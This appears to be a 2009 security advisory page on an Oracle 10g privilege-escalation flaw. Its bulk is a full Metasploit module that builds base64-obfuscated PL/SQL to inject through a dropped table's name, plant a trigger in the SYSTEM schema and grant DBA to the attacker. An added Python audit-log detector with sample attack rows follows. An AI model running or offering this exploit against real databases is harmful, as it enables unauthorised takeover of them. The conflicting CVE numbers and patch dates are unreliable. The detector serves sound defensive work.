Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)

Name:             Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)
Systems Affected: Unspecified vulnerability in the Oracle Spatial component in Oracle Database 10.1.0.5 and 10.2.0.2
Severity:         High Risk
Category:         Escalate Oracle user
Vendor URL:       http://www.oracle.com/
Credit:           David Litchfield (davidl at ngssoftware.com)
Exploit:          http://www.milw0rm.com
Date:             18 Feb 2009

Details

Unspecified vulnerability in the Oracle Spatial component in Oracle Database 10.1.0.5 and 10.2.0.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors. The exploit escalates an Oracle Database user's privileges to MDSYS by exploiting a SQL injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. When a user drops a table, the trigger fires. The name of the dropped table is embedded in a dynamic SQL query, which the trigger then executes, so a table name containing a single quote breaks out of the string literal and the remainder of the name runs as SQL in MDSYS's context. After that, the exploit escalates the user to DBA using the "CREATE ANY TRIGGER" privilege granted to the MDSYS user, by creating a malicious trigger in the SYSTEM schema (a two-stage privilege escalation). Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case; only the CREATE SESSION privilege is required.

Example
##
# $Id: droptable_trigger.rb
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger.',
      'Description'    => %q{
        This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in
        the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege
        given to MDSYS user by creating evil trigger in system scheme (2-stage attack).
      },
      'Author'         => [ 'Sh2kerr ' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2008-3979' ],
          [ 'URL', 'http://www.securityfocus.com/archive/1/500061' ],
          [ 'URL', 'http://www.ngssoftware.com/' ],
        ],
      'DisclosureDate' => 'Jan 13 2009'))

    register_options(
      [
        OptString.new('SQL',        [ false, 'The SQL to execute.',       'GRANT DBA TO SCOTT']),
        OptString.new('USER',       [ false, 'The current user. ',        'SCOTT']),
        OptString.new('FILENAME',   [ false, 'The file name.',            'msf.sql']),
        OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
      ], self.class)
  end

  def run
    name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand4 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
    rand5 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

    function1 = %Q|
      CREATE OR REPLACE PROCEDURE #{name1}
      AUTHID CURRENT_USER AS
      PRAGMA AUTONOMOUS_TRANSACTION;
      BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
      END;
    |

    function2 = %Q|
      CREATE OR REPLACE FUNCTION #{name2} RETURN number AUTHID CURRENT_USER is
      PRAGMA AUTONOMOUS_TRANSACTION;
      STMT VARCHAR2(400):= 'create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB DECLARE msg VARCHAR2(10);
      BEGIN #{datastore['USER']}.#{name1};
      end evil_trigger;';
      BEGIN
      EXECUTE IMMEDIATE STMT;
      COMMIT;
      RETURN 1;
      END;
    |

    prepare = "create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"

    exploiting1 = "drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
    exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"

    fun1 = Rex::Text.encode_base64(function1)
    fun2 = Rex::Text.encode_base64(function2)
    prp  = Rex::Text.encode_base64(prepare)
    exp1 = Rex::Text.encode_base64(exploiting1)
    exp2 = Rex::Text.encode_base64(exploiting2)

    sql = %Q|
      DECLARE
      #{rand1} VARCHAR2(32767);
      #{rand2} VARCHAR2(32767);
      #{rand3} VARCHAR2(32767);
      #{rand4} VARCHAR2(32767);
      #{rand5} VARCHAR2(32767);
      BEGIN
      #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun1}')));
      EXECUTE IMMEDIATE #{rand1};
      EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name1} TO PUBLIC';
      #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun2}')));
      EXECUTE IMMEDIATE #{rand2};
      EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name2} TO PUBLIC';
      #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
      EXECUTE IMMEDIATE #{rand3};
      #{rand4} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
      EXECUTE IMMEDIATE #{rand4};
      #{rand5} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp2}')));
      EXECUTE IMMEDIATE #{rand5};
      END;
      /
      DROP FUNCTION #{name1};
      DROP FUNCTION #{name2};
    |

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sql)
  end
end
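A defender-side check for the two stages described in Details, added here as an example that is not part of the advisory or of the Metasploit module. It scans audit-trail rows for object names carrying SQL metacharacters (stage one) and for triggers appearing in the SYSTEM schema under a session that is not SYS or SYSTEM (stage two); the row layout is modelled on the DBA_AUDIT_TRAIL columns a DBA would export (an assumption), and the rows themselves are constructed.

```python
"""Flag audit records consistent with the MDSYS.SDO_TOPO_DROP_FTBL abuse.

Added example (not from the advisory or the Metasploit module). Rows are
constructed here; column names follow DBA_AUDIT_TRAIL as an assumption.
"""
import re
from dataclasses import dataclass

# Inside a quoted Oracle identifier that is later glued into dynamic SQL, a
# single quote ends the string literal the trigger builds, "--" and "/*"
# comment out the rest of the statement, ";" terminates it.
INJECTION_MARKERS = re.compile(r"'|--|/\*|;")


@dataclass
class AuditRow:
    username: str      # session user recorded by auditing
    action_name: str   # e.g. 'CREATE TABLE', 'DROP TABLE', 'CREATE TRIGGER'
    owner: str         # schema of the object acted on
    obj_name: str
    sql_text: str = ""  # only populated when extended auditing is enabled


def suspicious_identifier(name):
    """True if an object name carries SQL metacharacters (stage one)."""
    return bool(INJECTION_MARKERS.search(name))


def find_findings(rows):
    """Return (rule, user, detail) tuples for rows that match a rule."""
    findings = []
    for r in rows:
        if r.action_name in ("CREATE TABLE", "DROP TABLE") and suspicious_identifier(r.obj_name):
            findings.append(("injected-identifier", r.username, r.obj_name))
        # Stage two: a trigger lands in SYSTEM without SYS/SYSTEM creating it.
        if r.action_name == "CREATE TRIGGER" and r.owner == "SYSTEM" \
                and r.username not in ("SYS", "SYSTEM"):
            findings.append(("foreign-trigger-in-system", r.username, r.obj_name))
        if re.search(r"\bGRANT\s+DBA\b", r.sql_text, re.I):
            findings.append(("dba-grant", r.username, r.sql_text.strip()))
    return findings


# Constructed sample: one benign DDL, the injected table name, the SYSTEM
# trigger, the resulting grant, and a legitimate SYS-owned trigger.
SAMPLE_ROWS = [
    AuditRow("HR", "CREATE TABLE", "HR", "EMP_BACKUP"),
    AuditRow("SCOTT", "CREATE TABLE", "SCOTT", "O' and 1=SCOTT.XQZ--"),
    AuditRow("SCOTT", "DROP TABLE", "SCOTT", "O' and 1=SCOTT.XQZ--"),
    AuditRow("SCOTT", "CREATE TRIGGER", "SYSTEM", "EVIL_TRIGGER"),
    AuditRow("SCOTT", "GRANT ROLE", "", "", "GRANT DBA TO SCOTT"),
    AuditRow("SYS", "CREATE TRIGGER", "SYSTEM", "LOGON_AUDIT"),
]
```

Run against a real export, the same rules can be expressed as queries on DBA_TABLES (object names containing a quote) and DBA_TRIGGERS (triggers with OWNER = 'SYSTEM' that were not expected), which also catches a stage-one table that was created but never dropped.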


Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009).


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published



© 2009 by Red-Database-Security GmbH - last update 19-jun-2009

Definition: Exploit
An exploit is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to a privilege escalation or denial of service on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.